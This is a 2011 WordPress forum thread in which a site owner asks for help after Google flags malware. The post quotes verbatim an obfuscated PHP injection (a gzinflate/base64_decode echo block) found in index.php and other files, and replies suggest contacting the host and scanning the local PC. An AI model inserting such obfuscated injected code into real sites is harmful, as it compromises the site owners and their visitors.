I believe my WP site got injected

Discussion in 'WordPress' started by Syimen, Aug 13, 2011.

0
  1. #1
    Hello, I need help and advice from you all.

    One ony my wordpress site got hacked, i got an email from Google saying that there is a malware in my site, my site is not not safe.

    After spending sometimes looking around via Filezilla, I found some a code in some .php (inducing index.php)

    the code exactly like this.

    #898dcf#
echo(gzinflate(base64_decode("7VdLj9MwEP4rq1zSqmzxI3YSZcOFOxxAXKoeQuvSoN2mSrIr0Gr/O/XYsR03YftASEgcduTYM+NvXp+7d82qLvftu49fv4tVO9/XVVu1P/di3oomvyXZU1HfNFlR5Otq9fggdu18VYuiFZ/Fj/ZDtRaTYFvU74NZcFgH06zJP7V1ufu2CDa13Hw4HBXFItxV63AWii9FOAvuH0WwXGabqp6UN+Xu+WVabiZlnoetVGnC6TZ/flmUy0w8FfeTZhLfbt/IP4woSHSQFERyEGkCm6lcghZmsCHXaQpL0MDRQUYRbGBzBrtceefWYtAYY3k/V0t5mBCpxozLmNtv4wFAUvjkFmlinMARBXdSROADd3uYYB39UBYwJgM3ql11r/xmPXNCu/TpALkJTeFFg9dekGYcGzAaNBw6WZFHLDkpKAULU6sgj5jJIEbEKZSS0oTJ8CLWie4ip9bIwUdMkCqcCC6RhgycEdtD3FFVkvUTmbq7qN8puk60c6dSimzzAVjdMLarcOK4dKsAigQgRj2hwTq5QbbZVesh6w2ykDodD4Y2yZCOyDMFHR0sNRG6d77iAFOnZmm/PE6BMXcKRS1c7pXV7TXlj3ELyIaohK01i02ldCWcW7p8UK9BmClOyh0Td7JYv/NZPNiAKlG8S48GEzlg0LECJIajbop6HT4+SmAAszdGD5ZrkNNkiZ394WRQdBE/DXAcdnqeWM+G+ZmhhPN5KbW0pObUK9CJr4Hl9RPIK+4lW6lGUZ8v9FtEj2iMeL3ud5SDxOdHNXTkP0leS5LjtRshLq1xOWf5L9s4cYHWJeDOpDqD6Cy+uxTdCEPap4RfE/oRsZ7s98/N6m+eXG9u/WfzLzDJ66/6qRiv/BX5b/xYVwRlaUyTmUUFTjjz5lnHkXRX6ydu+FmeTrO7t/rftV8=")));
#/898dcf#
    Code (markup):
    I have tried to remove them all, and report back to Google that it is now, clean, and Google said, I need to wait till Google check the site.

    and surprisingly when I can via FIlezilla again, those code are coming back to where it were.

    Please help me how to clean them all.

    Thank you
     
    Syimen, Aug 13, 2011 IP
  2. primitip

    primitip Active Member

    Messages:
    37
    Likes Received:
    3
    Best Answers:
    1
    Trophy Points:
    60
    #2
    Maybe you can ask your hosting provider to clean that malware, I'm sure they will gladly help since it's concerning their server security.
     
    primitip, Aug 13, 2011 IP
  3. Syimen

    Syimen Peon

    Messages:
    19
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #3
    I have contactedm via online chat but nothing she can do.

    so I asked her to create a ticket to the security dept. and I am still waiting for the update while I'm headache
     
    Syimen, Aug 13, 2011 IP
  4. primitip

    primitip Active Member

    Messages:
    37
    Likes Received:
    3
    Best Answers:
    1
    Trophy Points:
    60
    #4
    primitip, Aug 13, 2011 IP
  5. Big0ne

    Big0ne Well-Known Member

    Messages:
    2,614
    Likes Received:
    81
    Best Answers:
    0
    Trophy Points:
    165
    #5
    It could be local side, which means your PC is infected. Make sure you first scan for malware locally.

    So, nothing malicious happens when you contact to your FTP.
     
    Big0ne, Aug 14, 2011 IP
  6. adbox

    adbox Well-Known Member

    Messages:
    906
    Likes Received:
    7
    Best Answers:
    0
    Trophy Points:
    155
    Digital Goods:
    1
    #6
    adbox, Aug 15, 2011 IP